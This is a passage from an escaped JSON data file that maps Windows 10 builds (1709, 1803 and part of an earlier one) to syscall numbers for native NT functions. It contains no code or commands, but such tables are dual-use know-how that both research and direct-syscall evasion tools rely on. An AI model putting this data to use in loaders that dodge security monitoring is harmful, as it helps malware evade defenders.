\"NtDeleteWnfStateData\", \"208\": \"NtDeleteWnfStateName\", \"209\": \"NtDisableLastKnownGood\", \"210\": \"NtDisplayString\", \"211\": \"NtDrawText\", \"212\": \"NtEnableLastKnownGood\", \"213\": \"NtEnumerateBootEntries\", \"214\": \"NtEnumerateDriverEntries\", \"215\": \"NtEnumerateSystemEnvironmentValuesEx\", \"216\": \"NtEnumerateTransactionObject\", \"217\": \"NtExtendSection\", \"218\": \"NtFilterBootOption\", \"219\": \"NtFilterToken\", \"220\": \"NtFilterTokenEx\", \"221\": \"NtFlushBuffersFileEx\", \"222\": \"NtFlushInstallUILanguage\", \"223\": \"NtFlushInstructionCache\", \"224\": \"NtFlushKey\", \"225\": \"NtFlushProcessWriteBuffers\", \"226\": \"NtFlushVirtualMemory\", \"227\": \"NtFlushWriteBuffer\", \"228\": \"NtFreeUserPhysicalPages\", \"229\": \"NtFreezeRegistry\", \"230\": \"NtFreezeTransactions\", \"231\": \"NtGetCachedSigningLevel\", \"232\": \"NtGetCompleteWnfStateSubscription\", \"233\": \"NtGetContextThread\", \"234\": \"NtGetCurrentProcessorNumber\", \"235\": \"NtGetCurrentProcessorNumberEx\", \"236\": \"NtGetDevicePowerState\", \"237\": \"NtGetMUIRegistryInfo\", \"238\": \"NtGetNextProcess\", \"239\": \"NtGetNextThread\", \"240\": \"NtGetNlsSectionPtr\", \"241\": \"NtGetNotificationResourceManager\", \"242\": \"NtGetWriteWatch\", \"243\": \"NtImpersonateAnonymousToken\", \"244\": \"NtImpersonateThread\", \"245\": \"NtInitializeEnclave\", \"246\": \"NtInitializeNlsFiles\", \"247\": \"NtInitializeRegistry\", \"248\": \"NtInitiatePowerAction\", \"249\": \"NtIsSystemResumeAutomatic\", \"250\": \"NtIsUILanguageComitted\", \"251\": \"NtListenPort\", \"252\": \"NtLoadDriver\", \"253\": \"NtLoadEnclaveData\", \"254\": \"NtLoadHotPatch\", \"255\": \"NtLoadKey\", \"256\": \"NtLoadKey2\", \"257\": \"NtLoadKeyEx\", \"258\": \"NtLockFile\", \"259\": \"NtLockProductActivationKeys\", \"260\": \"NtLockRegistryKey\", \"261\": \"NtLockVirtualMemory\", \"262\": \"NtMakePermanentObject\", \"263\": \"NtMakeTemporaryObject\", \"264\": \"NtManagePartition\", \"265\": \"NtMapCMFModule\", \"266\": \"NtMapUserPhysicalPages\", \"267\": \"NtModifyBootEntry\", \"268\": \"NtModifyDriverEntry\", \"269\": \"NtNotifyChangeDirectoryFile\", \"270\": \"NtNotifyChangeKey\", \"271\": \"NtNotifyChangeMultipleKeys\", \"272\": \"NtNotifyChangeSession\", \"273\": \"NtOpenEnlistment\", \"274\": \"NtOpenEventPair\", \"275\": \"NtOpenIoCompletion\", \"276\": \"NtOpenJobObject\", \"277\": \"NtOpenKeyEx\", \"278\": \"NtOpenKeyTransacted\", \"279\": \"NtOpenKeyTransactedEx\", \"280\": \"NtOpenKeyedEvent\", \"281\": \"NtOpenMutant\", \"282\": \"NtOpenObjectAuditAlarm\", \"283\": \"NtOpenPartition\", \"284\": \"NtOpenPrivateNamespace\", \"285\": \"NtOpenProcessToken\", \"286\": \"NtOpenRegistryTransaction\", \"287\": \"NtOpenResourceManager\", \"288\": \"NtOpenSemaphore\", \"289\": \"NtOpenSession\", \"290\": \"NtOpenSymbolicLinkObject\", \"291\": \"NtOpenThread\", \"292\": \"NtOpenTimer\", \"293\": \"NtOpenTransaction\", \"294\": \"NtOpenTransactionManager\", \"295\": \"NtPlugPlayControl\", \"296\": \"NtPrePrepareComplete\", \"297\": \"NtPrePrepareEnlistment\", \"298\": \"NtPrepareComplete\", \"299\": \"NtPrepareEnlistment\", \"300\": \"NtPrivilegeCheck\", \"301\": \"NtPrivilegeObjectAuditAlarm\", \"302\": \"NtPrivilegedServiceAuditAlarm\", \"303\": \"NtPropagationComplete\", \"304\": \"NtPropagationFailed\", \"305\": \"NtPulseEvent\", \"306\": \"NtQueryAuxiliaryCounterFrequency\", \"307\": \"NtQueryBootEntryOrder\", \"308\": \"NtQueryBootOptions\", \"309\": \"NtQueryDebugFilterState\", \"310\": \"NtQueryDirectoryObject\", \"311\": \"NtQueryDriverEntryOrder\", \"312\": \"NtQueryEaFile\", \"313\": \"NtQueryFullAttributesFile\", \"314\": \"NtQueryInformationAtom\", \"315\": \"NtQueryInformationByName\", \"316\": \"NtQueryInformationEnlistment\", \"317\": \"NtQueryInformationJobObject\", \"318\": \"NtQueryInformationPort\", \"319\": \"NtQueryInformationResourceManager\", \"320\": \"NtQueryInformationTransaction\", \"321\": \"NtQueryInformationTransactionManager\", \"322\": \"NtQueryInformationWorkerFactory\", \"323\": \"NtQueryInstallUILanguage\", \"324\": \"NtQueryIntervalProfile\", \"325\": \"NtQueryIoCompletion\", \"326\": \"NtQueryLicenseValue\", \"327\": \"NtQueryMultipleValueKey\", \"328\": \"NtQueryMutant\", \"329\": \"NtQueryOpenSubKeys\", \"330\": \"NtQueryOpenSubKeysEx\", \"331\": \"NtQueryPortInformationProcess\", \"332\": \"NtQueryQuotaInformationFile\", \"333\": \"NtQuerySecurityAttributesToken\", \"334\": \"NtQuerySecurityObject\", \"335\": \"NtQuerySecurityPolicy\", \"336\": \"NtQuerySemaphore\", \"337\": \"NtQuerySymbolicLinkObject\", \"338\": \"NtQuerySystemEnvironmentValue\", \"339\": \"NtQuerySystemEnvironmentValueEx\", \"340\": \"NtQuerySystemInformationEx\", \"341\": \"NtQueryTimerResolution\", \"342\": \"NtQueryWnfStateData\", \"343\": \"NtQueryWnfStateNameInformation\", \"344\": \"NtQueueApcThreadEx\", \"345\": \"NtRaiseException\", \"346\": \"NtRaiseHardError\", \"347\": \"NtReadOnlyEnlistment\", \"348\": \"NtRecoverEnlistment\", \"349\": \"NtRecoverResourceManager\", \"350\": \"NtRecoverTransactionManager\", \"351\": \"NtRegisterProtocolAddressInformation\", \"352\": \"NtRegisterThreadTerminatePort\", \"353\": \"NtReleaseKeyedEvent\", \"354\": \"NtReleaseWorkerFactoryWorker\", \"355\": \"NtRemoveIoCompletionEx\", \"356\": \"NtRemoveProcessDebug\", \"357\": \"NtRenameKey\", \"358\": \"NtRenameTransactionManager\", \"359\": \"NtReplaceKey\", \"360\": \"NtReplacePartitionUnit\", \"361\": \"NtReplyWaitReplyPort\", \"362\": \"NtRequestPort\", \"363\": \"NtResetEvent\", \"364\": \"NtResetWriteWatch\", \"365\": \"NtRestoreKey\", \"366\": \"NtResumeProcess\", \"367\": \"NtRevertContainerImpersonation\", \"368\": \"NtRollbackComplete\", \"369\": \"NtRollbackEnlistment\", \"370\": \"NtRollbackRegistryTransaction\", \"371\": \"NtRollbackTransaction\", \"372\": \"NtRollforwardTransactionManager\", \"373\": \"NtSaveKey\", \"374\": \"NtSaveKeyEx\", \"375\": \"NtSaveMergedKeys\", \"376\": \"NtSecureConnectPort\", \"377\": \"NtSerializeBoot\", \"378\": \"NtSetBootEntryOrder\", \"379\": \"NtSetBootOptions\", \"380\": \"NtSetCachedSigningLevel\", \"381\": \"NtSetCachedSigningLevel2\", \"382\": \"NtSetContextThread\", \"383\": \"NtSetDebugFilterState\", \"384\": \"NtSetDefaultHardErrorPort\", \"385\": \"NtSetDefaultLocale\", \"386\": \"NtSetDefaultUILanguage\", \"387\": \"NtSetDriverEntryOrder\", \"388\": \"NtSetEaFile\", \"389\": \"NtSetHighEventPair\", \"390\": \"NtSetHighWaitLowEventPair\", \"391\": \"NtSetIRTimer\", \"392\": \"NtSetInformationDebugObject\", \"393\": \"NtSetInformationEnlistment\", \"394\": \"NtSetInformationJobObject\", \"395\": \"NtSetInformationKey\", \"396\": \"NtSetInformationResourceManager\", \"397\": \"NtSetInformationSymbolicLink\", \"398\": \"NtSetInformationToken\", \"399\": \"NtSetInformationTransaction\", \"400\": \"NtSetInformationTransactionManager\", \"401\": \"NtSetInformationVirtualMemory\", \"402\": \"NtSetInformationWorkerFactory\", \"403\": \"NtSetIntervalProfile\", \"404\": \"NtSetIoCompletion\", \"405\": \"NtSetIoCompletionEx\", \"406\": \"NtSetLdtEntries\", \"407\": \"NtSetLowEventPair\", \"408\": \"NtSetLowWaitHighEventPair\", \"409\": \"NtSetQuotaInformationFile\", \"410\": \"NtSetSecurityObject\", \"411\": \"NtSetSystemEnvironmentValue\", \"412\": \"NtSetSystemEnvironmentValueEx\", \"413\": \"NtSetSystemInformation\", \"414\": \"NtSetSystemPowerState\", \"415\": \"NtSetSystemTime\", \"416\": \"NtSetThreadExecutionState\", \"417\": \"NtSetTimer2\", \"418\": \"NtSetTimerEx\", \"419\": \"NtSetTimerResolution\", \"420\": \"NtSetUuidSeed\", \"421\": \"NtSetVolumeInformationFile\", \"422\": \"NtSetWnfProcessNotificationEvent\", \"423\": \"NtShutdownSystem\", \"424\": \"NtShutdownWorkerFactory\", \"425\": \"NtSignalAndWaitForSingleObject\", \"426\": \"NtSinglePhaseReject\", \"427\": \"NtStartProfile\", \"428\": \"NtStopProfile\", \"429\": \"NtSubscribeWnfStateChange\", \"430\": \"NtSuspendProcess\", \"431\": \"NtSuspendThread\", \"432\": \"NtSystemDebugControl\", \"433\": \"NtTerminateJobObject\", \"434\": \"NtTestAlert\", \"435\": \"NtThawRegistry\", \"436\": \"NtThawTransactions\", \"437\": \"NtTraceControl\", \"438\": \"NtTranslateFilePath\", \"439\": \"NtUmsThreadYield\", \"440\": \"NtUnloadDriver\", \"441\": \"NtUnloadKey\", \"442\": \"NtUnloadKey2\", \"443\": \"NtUnloadKeyEx\", \"444\": \"NtUnlockFile\", \"445\": \"NtUnlockVirtualMemory\", \"446\": \"NtUnmapViewOfSectionEx\", \"447\": \"NtUnsubscribeWnfStateChange\", \"448\": \"NtUpdateWnfStateData\", \"449\": \"NtVdmControl\", \"450\": \"NtWaitForAlertByThreadId\", \"451\": \"NtWaitForDebugEvent\", \"452\": \"NtWaitForKeyedEvent\", \"453\": \"NtWaitForWorkViaWorkerFactory\", \"454\": \"NtWaitHighEventPair\", \"455\": \"NtWaitLowEventPair\"}, \"1709\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", \"33\": \"NtQueryInformationToken\", \"34\": \"NtRequestWaitReplyPort\", \"35\": \"NtQueryVirtualMemory\", \"36\": \"NtOpenThreadToken\", \"37\": \"NtQueryInformationThread\", \"38\": \"NtOpenProcess\", \"39\": \"NtSetInformationFile\", \"40\": \"NtMapViewOfSection\", \"41\": \"NtAccessCheckAndAuditAlarm\", \"42\": \"NtUnmapViewOfSection\", \"43\": \"NtReplyWaitReceivePortEx\", \"44\": \"NtTerminateProcess\", \"45\": \"NtSetEventBoostPriority\", \"46\": \"NtReadFileScatter\", \"47\": \"NtOpenThreadTokenEx\", \"48\": \"NtOpenProcessTokenEx\", \"49\": \"NtQueryPerformanceCounter\", \"50\": \"NtEnumerateKey\", \"51\": \"NtOpenFile\", \"52\": \"NtDelayExecution\", \"53\": \"NtQueryDirectoryFile\", \"54\": \"NtQuerySystemInformation\", \"55\": \"NtOpenSection\", \"56\": \"NtQueryTimer\", \"57\": \"NtFsControlFile\", \"58\": \"NtWriteVirtualMemory\", \"59\": \"NtCloseObjectAuditAlarm\", \"60\": \"NtDuplicateObject\", \"61\": \"NtQueryAttributesFile\", \"62\": \"NtClearEvent\", \"63\": \"NtReadVirtualMemory\", \"64\": \"NtOpenEvent\", \"65\": \"NtAdjustPrivilegesToken\", \"66\": \"NtDuplicateToken\", \"67\": \"NtContinue\", \"68\": \"NtQueryDefaultUILanguage\", \"69\": \"NtQueueApcThread\", \"70\": \"NtYieldExecution\", \"71\": \"NtAddAtom\", \"72\": \"NtCreateEvent\", \"73\": \"NtQueryVolumeInformationFile\", \"74\": \"NtCreateSection\", \"75\": \"NtFlushBuffersFile\", \"76\": \"NtApphelpCacheControl\", \"77\": \"NtCreateProcessEx\", \"78\": \"NtCreateThread\", \"79\": \"NtIsProcessInJob\", \"80\": \"NtProtectVirtualMemory\", \"81\": \"NtQuerySection\", \"82\": \"NtResumeThread\", \"83\": \"NtTerminateThread\", \"84\": \"NtReadRequestData\", \"85\": \"NtCreateFile\", \"86\": \"NtQueryEvent\", \"87\": \"NtWriteRequestData\", \"88\": \"NtOpenDirectoryObject\", \"89\": \"NtAccessCheckByTypeAndAuditAlarm\", \"90\": \"NtQuerySystemTime\", \"91\": \"NtWaitForMultipleObjects\", \"92\": \"NtSetInformationObject\", \"93\": \"NtCancelIoFile\", \"94\": \"NtTraceEvent\", \"95\": \"NtPowerInformation\", \"96\": \"NtSetValueKey\", \"97\": \"NtCancelTimer\", \"98\": \"NtSetTimer\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAcquireProcessActivityReference\", \"104\": \"NtAddAtomEx\", \"105\": \"NtAddBootEntry\", \"106\": \"NtAddDriverEntry\", \"107\": \"NtAdjustGroupsToken\", \"108\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"109\": \"NtAlertResumeThread\", \"110\": \"NtAlertThread\", \"111\": \"NtAlertThreadByThreadId\", \"112\": \"NtAllocateLocallyUniqueId\", \"113\": \"NtAllocateReserveObject\", \"114\": \"NtAllocateUserPhysicalPages\", \"115\": \"NtAllocateUuids\", \"116\": \"NtAlpcAcceptConnectPort\", \"117\": \"NtAlpcCancelMessage\", \"118\": \"NtAlpcConnectPort\", \"119\": \"NtAlpcConnectPortEx\", \"120\": \"NtAlpcCreatePort\", \"121\": \"NtAlpcCreatePortSection\", \"122\": \"NtAlpcCreateResourceReserve\", \"123\": \"NtAlpcCreateSectionView\", \"124\": \"NtAlpcCreateSecurityContext\", \"125\": \"NtAlpcDeletePortSection\", \"126\": \"NtAlpcDeleteResourceReserve\", \"127\": \"NtAlpcDeleteSectionView\", \"128\": \"NtAlpcDeleteSecurityContext\", \"129\": \"NtAlpcDisconnectPort\", \"130\": \"NtAlpcImpersonateClientContainerOfPort\", \"131\": \"NtAlpcImpersonateClientOfPort\", \"132\": \"NtAlpcOpenSenderProcess\", \"133\": \"NtAlpcOpenSenderThread\", \"134\": \"NtAlpcQueryInformation\", \"135\": \"NtAlpcQueryInformationMessage\", \"136\": \"NtAlpcRevokeSecurityContext\", \"137\": \"NtAlpcSendWaitReceivePort\", \"138\": \"NtAlpcSetInformation\", \"139\": \"NtAreMappedFilesTheSame\", \"140\": \"NtAssignProcessToJobObject\", \"141\": \"NtAssociateWaitCompletionPacket\", \"142\": \"NtCallEnclave\", \"143\": \"NtCancelIoFileEx\", \"144\": \"NtCancelSynchronousIoFile\", \"145\": \"NtCancelTimer2\", \"146\": \"NtCancelWaitCompletionPacket\", \"147\": \"NtCommitComplete\", \"148\": \"NtCommitEnlistment\", \"149\": \"NtCommitRegistryTransaction\", \"150\": \"NtCommitTransaction\", \"151\": \"NtCompactKeys\", \"152\": \"NtCompareObjects\", \"153\": \"NtCompareSigningLevels\", \"154\": \"NtCompareTokens\", \"155\": \"NtCompleteConnectPort\", \"156\": \"NtCompressKey\", \"157\": \"NtConnectPort\", \"158\": \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\", \"159\": \"NtCreateDebugObject\", \"160\": \"NtCreateDirectoryObject\", \"161\": \"NtCreateDirectoryObjectEx\", \"162\": \"NtCreateEnclave\", \"163\": \"NtCreateEnlistment\", \"164\": \"NtCreateEventPair\", \"165\": \"NtCreateIRTimer\", \"166\": \"NtCreateIoCompletion\", \"167\": \"NtCreateJobObject\", \"168\": \"NtCreateJobSet\", \"169\": \"NtCreateKeyTransacted\", \"170\": \"NtCreateKeyedEvent\", \"171\": \"NtCreateLowBoxToken\", \"172\": \"NtCreateMailslotFile\", \"173\": \"NtCreateMutant\", \"174\": \"NtCreateNamedPipeFile\", \"175\": \"NtCreatePagingFile\", \"176\": \"NtCreatePartition\", \"177\": \"NtCreatePort\", \"178\": \"NtCreatePrivateNamespace\", \"179\": \"NtCreateProcess\", \"180\": \"NtCreateProfile\", \"181\": \"NtCreateProfileEx\", \"182\": \"NtCreateRegistryTransaction\", \"183\": \"NtCreateResourceManager\", \"184\": \"NtCreateSemaphore\", \"185\": \"NtCreateSymbolicLinkObject\", \"186\": \"NtCreateThreadEx\", \"187\": \"NtCreateTimer\", \"188\": \"NtCreateTimer2\", \"189\": \"NtCreateToken\", \"190\": \"NtCreateTokenEx\", \"191\": \"NtCreateTransaction\", \"192\": \"NtCreateTransactionManager\", \"193\": \"NtCreateUserProcess\", \"194\": \"NtCreateWaitCompletionPacket\", \"195\": \"NtCreateWaitablePort\", \"196\": \"NtCreateWnfStateName\", \"197\": \"NtCreateWorkerFactory\", \"198\": \"NtDebugActiveProcess\", \"199\": \"NtDebugContinue\", \"200\": \"NtDeleteAtom\", \"201\": \"NtDeleteBootEntry\", \"202\": \"NtDeleteDriverEntry\", \"203\": \"NtDeleteFile\", \"204\": \"NtDeleteKey\", \"205\": \"NtDeleteObjectAuditAlarm\", \"206\": \"NtDeletePrivateNamespace\", \"207\": \"NtDeleteValueKey\", \"208\": \"NtDeleteWnfStateData\", \"209\": \"NtDeleteWnfStateName\", \"210\": \"NtDisableLastKnownGood\", \"211\": \"NtDisplayString\", \"212\": \"NtDrawText\", \"213\": \"NtEnableLastKnownGood\", \"214\": \"NtEnumerateBootEntries\", \"215\": \"NtEnumerateDriverEntries\", \"216\": \"NtEnumerateSystemEnvironmentValuesEx\", \"217\": \"NtEnumerateTransactionObject\", \"218\": \"NtExtendSection\", \"219\": \"NtFilterBootOption\", \"220\": \"NtFilterToken\", \"221\": \"NtFilterTokenEx\", \"222\": \"NtFlushBuffersFileEx\", \"223\": \"NtFlushInstallUILanguage\", \"224\": \"NtFlushInstructionCache\", \"225\": \"NtFlushKey\", \"226\": \"NtFlushProcessWriteBuffers\", \"227\": \"NtFlushVirtualMemory\", \"228\": \"NtFlushWriteBuffer\", \"229\": \"NtFreeUserPhysicalPages\", \"230\": \"NtFreezeRegistry\", \"231\": \"NtFreezeTransactions\", \"232\": \"NtGetCachedSigningLevel\", \"233\": \"NtGetCompleteWnfStateSubscription\", \"234\": \"NtGetContextThread\", \"235\": \"NtGetCurrentProcessorNumber\", \"236\": \"NtGetCurrentProcessorNumberEx\", \"237\": \"NtGetDevicePowerState\", \"238\": \"NtGetMUIRegistryInfo\", \"239\": \"NtGetNextProcess\", \"240\": \"NtGetNextThread\", \"241\": \"NtGetNlsSectionPtr\", \"242\": \"NtGetNotificationResourceManager\", \"243\": \"NtGetWriteWatch\", \"244\": \"NtImpersonateAnonymousToken\", \"245\": \"NtImpersonateThread\", \"246\": \"NtInitializeEnclave\", \"247\": \"NtInitializeNlsFiles\", \"248\": \"NtInitializeRegistry\", \"249\": \"NtInitiatePowerAction\", \"250\": \"NtIsSystemResumeAutomatic\", \"251\": \"NtIsUILanguageComitted\", \"252\": \"NtListenPort\", \"253\": \"NtLoadDriver\", \"254\": \"NtLoadEnclaveData\", \"255\": \"NtLoadHotPatch\", \"256\": \"NtLoadKey\", \"257\": \"NtLoadKey2\", \"258\": \"NtLoadKeyEx\", \"259\": \"NtLockFile\", \"260\": \"NtLockProductActivationKeys\", \"261\": \"NtLockRegistryKey\", \"262\": \"NtLockVirtualMemory\", \"263\": \"NtMakePermanentObject\", \"264\": \"NtMakeTemporaryObject\", \"265\": \"NtManagePartition\", \"266\": \"NtMapCMFModule\", \"267\": \"NtMapUserPhysicalPages\", \"268\": \"NtModifyBootEntry\", \"269\": \"NtModifyDriverEntry\", \"270\": \"NtNotifyChangeDirectoryFile\", \"271\": \"NtNotifyChangeDirectoryFileEx\", \"272\": \"NtNotifyChangeKey\", \"273\": \"NtNotifyChangeMultipleKeys\", \"274\": \"NtNotifyChangeSession\", \"275\": \"NtOpenEnlistment\", \"276\": \"NtOpenEventPair\", \"277\": \"NtOpenIoCompletion\", \"278\": \"NtOpenJobObject\", \"279\": \"NtOpenKeyEx\", \"280\": \"NtOpenKeyTransacted\", \"281\": \"NtOpenKeyTransactedEx\", \"282\": \"NtOpenKeyedEvent\", \"283\": \"NtOpenMutant\", \"284\": \"NtOpenObjectAuditAlarm\", \"285\": \"NtOpenPartition\", \"286\": \"NtOpenPrivateNamespace\", \"287\": \"NtOpenProcessToken\", \"288\": \"NtOpenRegistryTransaction\", \"289\": \"NtOpenResourceManager\", \"290\": \"NtOpenSemaphore\", \"291\": \"NtOpenSession\", \"292\": \"NtOpenSymbolicLinkObject\", \"293\": \"NtOpenThread\", \"294\": \"NtOpenTimer\", \"295\": \"NtOpenTransaction\", \"296\": \"NtOpenTransactionManager\", \"297\": \"NtPlugPlayControl\", \"298\": \"NtPrePrepareComplete\", \"299\": \"NtPrePrepareEnlistment\", \"300\": \"NtPrepareComplete\", \"301\": \"NtPrepareEnlistment\", \"302\": \"NtPrivilegeCheck\", \"303\": \"NtPrivilegeObjectAuditAlarm\", \"304\": \"NtPrivilegedServiceAuditAlarm\", \"305\": \"NtPropagationComplete\", \"306\": \"NtPropagationFailed\", \"307\": \"NtPulseEvent\", \"308\": \"NtQueryAuxiliaryCounterFrequency\", \"309\": \"NtQueryBootEntryOrder\", \"310\": \"NtQueryBootOptions\", \"311\": \"NtQueryDebugFilterState\", \"312\": \"NtQueryDirectoryFileEx\", \"313\": \"NtQueryDirectoryObject\", \"314\": \"NtQueryDriverEntryOrder\", \"315\": \"NtQueryEaFile\", \"316\": \"NtQueryFullAttributesFile\", \"317\": \"NtQueryInformationAtom\", \"318\": \"NtQueryInformationByName\", \"319\": \"NtQueryInformationEnlistment\", \"320\": \"NtQueryInformationJobObject\", \"321\": \"NtQueryInformationPort\", \"322\": \"NtQueryInformationResourceManager\", \"323\": \"NtQueryInformationTransaction\", \"324\": \"NtQueryInformationTransactionManager\", \"325\": \"NtQueryInformationWorkerFactory\", \"326\": \"NtQueryInstallUILanguage\", \"327\": \"NtQueryIntervalProfile\", \"328\": \"NtQueryIoCompletion\", \"329\": \"NtQueryLicenseValue\", \"330\": \"NtQueryMultipleValueKey\", \"331\": \"NtQueryMutant\", \"332\": \"NtQueryOpenSubKeys\", \"333\": \"NtQueryOpenSubKeysEx\", \"334\": \"NtQueryPortInformationProcess\", \"335\": \"NtQueryQuotaInformationFile\", \"336\": \"NtQuerySecurityAttributesToken\", \"337\": \"NtQuerySecurityObject\", \"338\": \"NtQuerySecurityPolicy\", \"339\": \"NtQuerySemaphore\", \"340\": \"NtQuerySymbolicLinkObject\", \"341\": \"NtQuerySystemEnvironmentValue\", \"342\": \"NtQuerySystemEnvironmentValueEx\", \"343\": \"NtQuerySystemInformationEx\", \"344\": \"NtQueryTimerResolution\", \"345\": \"NtQueryWnfStateData\", \"346\": \"NtQueryWnfStateNameInformation\", \"347\": \"NtQueueApcThreadEx\", \"348\": \"NtRaiseException\", \"349\": \"NtRaiseHardError\", \"350\": \"NtReadOnlyEnlistment\", \"351\": \"NtRecoverEnlistment\", \"352\": \"NtRecoverResourceManager\", \"353\": \"NtRecoverTransactionManager\", \"354\": \"NtRegisterProtocolAddressInformation\", \"355\": \"NtRegisterThreadTerminatePort\", \"356\": \"NtReleaseKeyedEvent\", \"357\": \"NtReleaseWorkerFactoryWorker\", \"358\": \"NtRemoveIoCompletionEx\", \"359\": \"NtRemoveProcessDebug\", \"360\": \"NtRenameKey\", \"361\": \"NtRenameTransactionManager\", \"362\": \"NtReplaceKey\", \"363\": \"NtReplacePartitionUnit\", \"364\": \"NtReplyWaitReplyPort\", \"365\": \"NtRequestPort\", \"366\": \"NtResetEvent\", \"367\": \"NtResetWriteWatch\", \"368\": \"NtRestoreKey\", \"369\": \"NtResumeProcess\", \"370\": \"NtRevertContainerImpersonation\", \"371\": \"NtRollbackComplete\", \"372\": \"NtRollbackEnlistment\", \"373\": \"NtRollbackRegistryTransaction\", \"374\": \"NtRollbackTransaction\", \"375\": \"NtRollforwardTransactionManager\", \"376\": \"NtSaveKey\", \"377\": \"NtSaveKeyEx\", \"378\": \"NtSaveMergedKeys\", \"379\": \"NtSecureConnectPort\", \"380\": \"NtSerializeBoot\", \"381\": \"NtSetBootEntryOrder\", \"382\": \"NtSetBootOptions\", \"383\": \"NtSetCachedSigningLevel\", \"384\": \"NtSetCachedSigningLevel2\", \"385\": \"NtSetContextThread\", \"386\": \"NtSetDebugFilterState\", \"387\": \"NtSetDefaultHardErrorPort\", \"388\": \"NtSetDefaultLocale\", \"389\": \"NtSetDefaultUILanguage\", \"390\": \"NtSetDriverEntryOrder\", \"391\": \"NtSetEaFile\", \"392\": \"NtSetHighEventPair\", \"393\": \"NtSetHighWaitLowEventPair\", \"394\": \"NtSetIRTimer\", \"395\": \"NtSetInformationDebugObject\", \"396\": \"NtSetInformationEnlistment\", \"397\": \"NtSetInformationJobObject\", \"398\": \"NtSetInformationKey\", \"399\": \"NtSetInformationResourceManager\", \"400\": \"NtSetInformationSymbolicLink\", \"401\": \"NtSetInformationToken\", \"402\": \"NtSetInformationTransaction\", \"403\": \"NtSetInformationTransactionManager\", \"404\": \"NtSetInformationVirtualMemory\", \"405\": \"NtSetInformationWorkerFactory\", \"406\": \"NtSetIntervalProfile\", \"407\": \"NtSetIoCompletion\", \"408\": \"NtSetIoCompletionEx\", \"409\": \"NtSetLdtEntries\", \"410\": \"NtSetLowEventPair\", \"411\": \"NtSetLowWaitHighEventPair\", \"412\": \"NtSetQuotaInformationFile\", \"413\": \"NtSetSecurityObject\", \"414\": \"NtSetSystemEnvironmentValue\", \"415\": \"NtSetSystemEnvironmentValueEx\", \"416\": \"NtSetSystemInformation\", \"417\": \"NtSetSystemPowerState\", \"418\": \"NtSetSystemTime\", \"419\": \"NtSetThreadExecutionState\", \"420\": \"NtSetTimer2\", \"421\": \"NtSetTimerEx\", \"422\": \"NtSetTimerResolution\", \"423\": \"NtSetUuidSeed\", \"424\": \"NtSetVolumeInformationFile\", \"425\": \"NtSetWnfProcessNotificationEvent\", \"426\": \"NtShutdownSystem\", \"427\": \"NtShutdownWorkerFactory\", \"428\": \"NtSignalAndWaitForSingleObject\", \"429\": \"NtSinglePhaseReject\", \"430\": \"NtStartProfile\", \"431\": \"NtStopProfile\", \"432\": \"NtSubscribeWnfStateChange\", \"433\": \"NtSuspendProcess\", \"434\": \"NtSuspendThread\", \"435\": \"NtSystemDebugControl\", \"436\": \"NtTerminateEnclave\", \"437\": \"NtTerminateJobObject\", \"438\": \"NtTestAlert\", \"439\": \"NtThawRegistry\", \"440\": \"NtThawTransactions\", \"441\": \"NtTraceControl\", \"442\": \"NtTranslateFilePath\", \"443\": \"NtUmsThreadYield\", \"444\": \"NtUnloadDriver\", \"445\": \"NtUnloadKey\", \"446\": \"NtUnloadKey2\", \"447\": \"NtUnloadKeyEx\", \"448\": \"NtUnlockFile\", \"449\": \"NtUnlockVirtualMemory\", \"450\": \"NtUnmapViewOfSectionEx\", \"451\": \"NtUnsubscribeWnfStateChange\", \"452\": \"NtUpdateWnfStateData\", \"453\": \"NtVdmControl\", \"454\": \"NtWaitForAlertByThreadId\", \"455\": \"NtWaitForDebugEvent\", \"456\": \"NtWaitForKeyedEvent\", \"457\": \"NtWaitForWorkViaWorkerFactory\", \"458\": \"NtWaitHighEventPair\", \"459\": \"NtWaitLowEventPair\"}, \"1803\": {\"0\": \"NtAccessCheck\", \"1\": \"NtWorkerFactoryWorkerReady\", \"2\": \"NtAcceptConnectPort\", \"3\": \"NtMapUserPhysicalPagesScatter\", \"4\": \"NtWaitForSingleObject\", \"5\": \"NtCallbackReturn\", \"6\": \"NtReadFile\", \"7\": \"NtDeviceIoControlFile\", \"8\": \"NtWriteFile\", \"9\": \"NtRemoveIoCompletion\", \"10\": \"NtReleaseSemaphore\", \"11\": \"NtReplyWaitReceivePort\", \"12\": \"NtReplyPort\", \"13\": \"NtSetInformationThread\", \"14\": \"NtSetEvent\", \"15\": \"NtClose\", \"16\": \"NtQueryObject\", \"17\": \"NtQueryInformationFile\", \"18\": \"NtOpenKey\", \"19\": \"NtEnumerateValueKey\", \"20\": \"NtFindAtom\", \"21\": \"NtQueryDefaultLocale\", \"22\": \"NtQueryKey\", \"23\": \"NtQueryValueKey\", \"24\": \"NtAllocateVirtualMemory\", \"25\": \"NtQueryInformationProcess\", \"26\": \"NtWaitForMultipleObjects32\", \"27\": \"NtWriteFileGather\", \"28\": \"NtSetInformationProcess\", \"29\": \"NtCreateKey\", \"30\": \"NtFreeVirtualMemory\", \"31\": \"NtImpersonateClientOfPort\", \"32\": \"NtReleaseMutant\", 